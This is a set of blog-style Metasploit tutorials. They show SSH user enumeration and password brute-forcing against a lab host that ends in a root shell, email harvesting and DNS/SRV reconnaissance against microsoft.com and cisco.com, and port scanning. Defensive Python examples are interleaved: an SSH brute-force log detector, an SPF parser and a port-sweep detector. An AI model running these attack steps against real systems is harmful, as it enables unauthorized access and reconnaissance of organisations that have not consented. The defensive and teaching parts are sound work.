Hacking SSH with Metasploit Auxiliary Modules

SSH is another popular service targeted by attackers. In this post I am going to show how to use Metasploit auxiliary modules to run a dictionary (brute-force) password attack against an SSH server.

First we need valid usernames for the password-guessing attack. We can enumerate usernames with the Metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >


The username 'root' is found. Before guessing passwords, let's do something else.

Let's find out the SSH server version for future reference when looking for exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Now let's guess the password. Always try to have a good password list, otherwise it is a waste of time: guessing passwords over SSH is slow. Here is how we can attack the SSH server with auxiliary/scanner/ssh/ssh_login:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
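What the runs above look like from the server side, as an added example that is not part of the original post: a small Python detector over constructed sshd auth.log lines (hostname, PIDs, source ports and the 192.168.67.10 entries are made up; the year is assumed to be 2014 because syslog timestamps carry none). It flags a source that fails many logins in a short window, a source that probes many non-existent usernames (what ssh_enumusers and a user list produce), and, most importantly, a successful login from a source that was guessing, which is the signal a responder acts on first. The thresholds are my own defaults, not anything from Metasploit.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of what the target's /var/log/auth.log would show during the
# ssh_login run above. Hostname, PIDs, ports and the 192.168.67.10 lines are made up.
SAMPLE_AUTH_LOG = """\
Dec 17 04:23:52 owaspbwa sshd[2101]: Accepted password for root from 192.168.67.139 port 44027 ssh2
Dec 17 04:23:53 owaspbwa sshd[2104]: Invalid user owaspbroken from 192.168.67.139
Dec 17 04:23:53 owaspbwa sshd[2104]: Failed password for invalid user owaspbroken from 192.168.67.139 port 44029 ssh2
Dec 17 04:23:54 owaspbwa sshd[2106]: Invalid user broken from 192.168.67.139
Dec 17 04:23:54 owaspbwa sshd[2106]: Failed password for invalid user broken from 192.168.67.139 port 44031 ssh2
Dec 17 04:23:55 owaspbwa sshd[2108]: Invalid user mag from 192.168.67.139
Dec 17 04:23:55 owaspbwa sshd[2108]: Failed password for invalid user mag from 192.168.67.139 port 44033 ssh2
Dec 17 04:23:56 owaspbwa sshd[2110]: Invalid user admin from 192.168.67.139
Dec 17 04:23:56 owaspbwa sshd[2110]: Failed password for invalid user admin from 192.168.67.139 port 44035 ssh2
Dec 17 04:23:57 owaspbwa sshd[2112]: Invalid user Administrator from 192.168.67.139
Dec 17 04:23:57 owaspbwa sshd[2112]: Failed password for invalid user Administrator from 192.168.67.139 port 44037 ssh2
Dec 17 04:23:58 owaspbwa sshd[2114]: Invalid user owaspbwa from 192.168.67.139
Dec 17 04:23:58 owaspbwa sshd[2114]: Failed password for invalid user owaspbwa from 192.168.67.139 port 44039 ssh2
Dec 17 04:25:06 owaspbwa sshd[2130]: Accepted password for root from 192.168.67.139 port 43450 ssh2
Dec 17 04:30:00 owaspbwa sshd[2200]: Failed password for root from 192.168.67.10 port 51000 ssh2
Dec 17 04:31:00 owaspbwa sshd[2201]: Accepted publickey for deploy from 192.168.67.10 port 51002 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<msg>.*)$")
ACCEPTED_RE = re.compile(r"^Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
FAILED_RE = re.compile(r"^Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
INVALID_RE = re.compile(r"^Invalid user (?P<user>\S+) from (?P<ip>\S+)")


def parse_auth_log(text, year=2014):
    """Turn sshd syslog lines into events: {ts, kind, user, ip}. The year is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        for kind, rx in (("accepted", ACCEPTED_RE), ("failed", FAILED_RE), ("invalid", INVALID_RE)):
            hit = rx.match(m["msg"])
            if hit:
                events.append({"ts": ts, "kind": kind, "user": hit["user"], "ip": hit["ip"]})
                break
    return events


def detect_ssh_guessing(events, window_seconds=120, fail_threshold=5, enum_threshold=3):
    """Return alerts per source IP: password guessing, username enumeration, success after guessing."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["kind"] == "failed"]
        invalid_users = {e["user"] for e in evs if e["kind"] == "invalid"}
        # Sliding window: a burst is fail_threshold or more failures inside window_seconds.
        burst, start = False, 0
        for end in range(len(failures)):
            while (failures[end]["ts"] - failures[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= fail_threshold:
                burst = True
                break
        if burst:
            alerts.append({"type": "password_guessing", "ip": ip, "failures": len(failures)})
        if len(invalid_users) >= enum_threshold:
            alerts.append({"type": "username_enumeration", "ip": ip, "users": sorted(invalid_users)})
        # Highest severity: a login accepted from a source that was guessing in the same window.
        # Metasploit reported the root success before the failures, so order is not relied on.
        if burst:
            for acc in (e for e in evs if e["kind"] == "accepted"):
                near = [f for f in failures
                        if abs((f["ts"] - acc["ts"]).total_seconds()) <= window_seconds]
                if near:
                    alerts.append({"type": "success_after_guessing", "ip": ip,
                                   "user": acc["user"], "nearby_failures": len(near)})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_guessing(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The one mistyped password followed by a key-based login from 192.168.67.10 produces no alert, which is the point of tying the success alert to a source that already crossed the burst threshold; a rule that fired on any failure-then-success pair would page you for every admin who fat-fingered a password.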


Let me know if you have questions!

Metasploit Information Gathering Basic [Search for info]

Metasploit is an open source penetration testing framework. Using some Metasploit auxiliary modules we can gather information about our target. Let's see how to do it in simple steps, starting by collecting email addresses.

msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results...
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >


Is Microsoft a little scared to post their email addresses publicly?

Let's find some DNS information with Metasploit against microsoft.com:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com - Address 134.170.188.221 found. Record type: A
[+] microsoft.com - Address 134.170.185.46 found. Record type: A
[+] microsoft.com - Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com - Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com - ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com - ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com - Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com - Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 
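The SPF TXT record returned by dns_info above is worth reading, not just collecting. The following Python parser is an added example, not part of the original post or of Metasploit: it splits the record into qualified mechanisms and modifiers, counts the terms that cost a DNS lookup (RFC 7208 allows at most 10 per evaluation), reports the 'all' qualifier, and checks whether a given IP is listed directly by an ip4/ip6 mechanism. Included records are not fetched, so it runs offline; review_spf and its checks are my own.

```python
import ipaddress

# The SPF TXT record for microsoft.com as returned by dns_info above (copied from the page).
MICROSOFT_SPF = (
    "v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com "
    "include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com "
    "include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 "
    "ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all"
)

QUALIFIERS = "+-~?"
# Mechanisms and modifiers that cost a DNS query; RFC 7208 permits at most 10 per evaluation.
DNS_COSTING = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_spf(record):
    """Split an SPF record into qualified mechanisms and modifiers. include: targets are not resolved."""
    tokens = record.split()
    if not tokens or tokens[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    parsed = {"terms": [], "includes": [], "ip4": [], "ip6": [],
              "all": None, "modifiers": {}, "lookups": 0}
    for token in tokens[1:]:
        # Modifiers look like name=value (redirect=, exp=); mechanisms use ':' or nothing.
        if "=" in token.split(":")[0]:
            name, _, value = token.partition("=")
            name = name.lower()
            parsed["modifiers"][name] = value
            if name in DNS_COSTING:
                parsed["lookups"] += 1
            continue
        qualifier = "+"                       # an unqualified mechanism means "+"
        if token[0] in QUALIFIERS:
            qualifier, token = token[0], token[1:]
        mech, _, arg = token.partition(":")
        if "/" in mech:                       # "a/24" or "mx/24": keep the prefix length as the argument
            mech, _, arg = mech.partition("/")
            arg = "/" + arg
        mech = mech.lower()
        if mech == "all":
            parsed["all"] = qualifier
        elif mech == "include":
            parsed["includes"].append(arg)
        elif mech == "ip4":
            parsed["ip4"].append(ipaddress.IPv4Network(arg, strict=False))   # bare address -> /32
        elif mech == "ip6":
            parsed["ip6"].append(ipaddress.IPv6Network(arg, strict=False))
        if mech in DNS_COSTING:
            parsed["lookups"] += 1
        parsed["terms"].append((qualifier, mech, arg))
    return parsed


def ip_listed_directly(parsed, ip):
    """True if ip is covered by an ip4/ip6 mechanism of this record itself (not via include:)."""
    addr = ipaddress.ip_address(ip)
    nets = parsed["ip4"] if addr.version == 4 else parsed["ip6"]
    return any(addr in net for net in nets)


def review_spf(parsed):
    """Findings a defender would raise about the record; the limits follow RFC 7208."""
    findings = []
    if parsed["all"] is None and "redirect" not in parsed["modifiers"]:
        findings.append("no 'all' term: unlisted senders get a neutral result, as if '?all'")
    elif parsed["all"] in ("+", "?"):
        findings.append(f"'{parsed['all']}all' lets unlisted senders pass or stay neutral")
    if parsed["lookups"] > 10:
        findings.append(f"{parsed['lookups']} DNS-querying terms exceed the limit of 10 (permerror)")
    return findings


if __name__ == "__main__":
    record = parse_spf(MICROSOFT_SPF)
    print("includes:", record["includes"])
    print("lookups used:", record["lookups"], "all:", record["all"])
    print("147.243.128.24 listed directly:", ip_listed_directly(record, "147.243.128.24"))
    print("findings:", review_spf(record) or "none")
```

For the record above the parser reports five includes, five lookups used, a hard-fail '-all' and no findings; feed it a record ending in '+all' or one with more than ten include/a/mx terms and review_spf names the problem.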

To find SRV records, do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed


I was a bit lazy about formatting the text as code, so this might be a little hard to read. But I think you now have a basic idea of how you can use Metasploit for information gathering. If you would like to see more details or have any questions, you can post comments here.


Metasploit Port Scanning

Port scanning is often done by attackers and penetration testers to identify and discover the services running on a target host. It is an important step for gathering more information about the target. Today we will see how to use Metasploit to scan ports. Metasploit is a free, open source and popular exploitation framework, widely used by attackers and professional penetration testers. Let's see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit is already installed! Otherwise download it from Rapid7 and install it.


Our Target: http://192.168.67.136/


Our First Module is auxiliary/scanner/portscan/syn


Now let's start scanning!

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

We simply need to set RHOSTS, which is 192.168.67.136, and a port range, such as 1-65535 (do you really want to scan all ports?):

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >


Now set the interesting ports and execute the "run" command:

msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >


Now let's see how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 - TCP OPEN
[*] 192.168.67.136:22 - TCP OPEN
[*] 192.168.67.136:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
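Both scans above touch the same five ports on 192.168.67.136 within about a second, which is easy to spot on the target if inbound connection attempts are logged. The Python below is an added example, not from the original post or from Metasploit: it parses constructed iptables LOG lines (a LOG rule on NEW inbound TCP; MAC addresses, IDs, kernel timestamps and the 192.168.67.10 entries are made up, and the year is assumed to be 2014) and flags a source that hits many distinct destination ports in a short window, listing which of those ports the host was not even listening on. The window and threshold are my own defaults.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables LOG output (rule: -m conntrack --ctstate NEW -j LOG --log-prefix "IPT-NEW ")
# modelled on the scan of ports 80,3306,22,1337,139 above. MACs, IDs and timestamps are made up.
SAMPLE_KERNEL_LOG = """\
Dec 17 04:40:01 owaspbwa kernel: [ 8812.101] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:44:55:66:08:00 SRC=192.168.67.139 DST=192.168.67.136 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1001 PROTO=TCP SPT=51001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Dec 17 04:40:01 owaspbwa kernel: [ 8812.102] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:44:55:66:08:00 SRC=192.168.67.139 DST=192.168.67.136 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1002 PROTO=TCP SPT=51002 DPT=3306 WINDOW=1024 RES=0x00 SYN URGP=0
Dec 17 04:40:01 owaspbwa kernel: [ 8812.103] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:44:55:66:08:00 SRC=192.168.67.139 DST=192.168.67.136 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1003 PROTO=TCP SPT=51003 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Dec 17 04:40:02 owaspbwa kernel: [ 8812.904] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:44:55:66:08:00 SRC=192.168.67.139 DST=192.168.67.136 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1004 PROTO=TCP SPT=51004 DPT=1337 WINDOW=1024 RES=0x00 SYN URGP=0
Dec 17 04:40:02 owaspbwa kernel: [ 8812.905] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:44:55:66:08:00 SRC=192.168.67.139 DST=192.168.67.136 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1005 PROTO=TCP SPT=51005 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
Dec 17 04:45:10 owaspbwa kernel: [ 9121.300] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:77:88:99:08:00 SRC=192.168.67.10 DST=192.168.67.136 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2001 PROTO=TCP SPT=40001 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Dec 17 04:46:30 owaspbwa kernel: [ 9201.300] IPT-NEW IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:0c:29:77:88:99:08:00 SRC=192.168.67.10 DST=192.168.67.136 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2002 PROTO=TCP SPT=40002 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: (?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S*)")   # netfilter LOG fields are KEY=VALUE; TCP flags are bare words


def parse_kernel_log(text, year=2014):
    """Turn iptables LOG lines into TCP events: {ts, src, dst, dpt, syn_only}. The year is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fields = dict(KV_RE.findall(m["rest"]))
        if fields.get("PROTO") != "TCP" or "DPT" not in fields:
            continue
        tokens = m["rest"].split()
        events.append({
            "ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
            "src": fields["SRC"], "dst": fields["DST"], "dpt": int(fields["DPT"]),
            "syn_only": "SYN" in tokens and "ACK" not in tokens,
        })
    return events


def detect_port_sweeps(events, window_seconds=10, port_threshold=4, listening_ports=()):
    """Alert on a source touching port_threshold or more distinct ports inside window_seconds."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = set(), 0
        for end in range(len(evs)):   # sliding window; keep the largest distinct-port set seen
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            ports = {e["dpt"] for e in evs[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= port_threshold:
            # Probes to ports nothing listens on are the strongest sign of a sweep rather than traffic.
            alerts.append({"type": "port_sweep", "src": src, "ports": sorted(best),
                           "not_listening": sorted(best - set(listening_ports))})
    return alerts


if __name__ == "__main__":
    evs = parse_kernel_log(SAMPLE_KERNEL_LOG)
    for alert in detect_port_sweeps(evs, listening_ports={22, 80, 139}):
        print(alert)
```

With the host's real listeners (22, 80, 139 from the scan results) passed in, the alert names 1337 and 3306 as ports that were probed although nothing listens there, while the two ordinary connections from 192.168.67.10 stay quiet.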

Really easy, but nmap is best!

More Metasploit Tutorials Coming soon! :)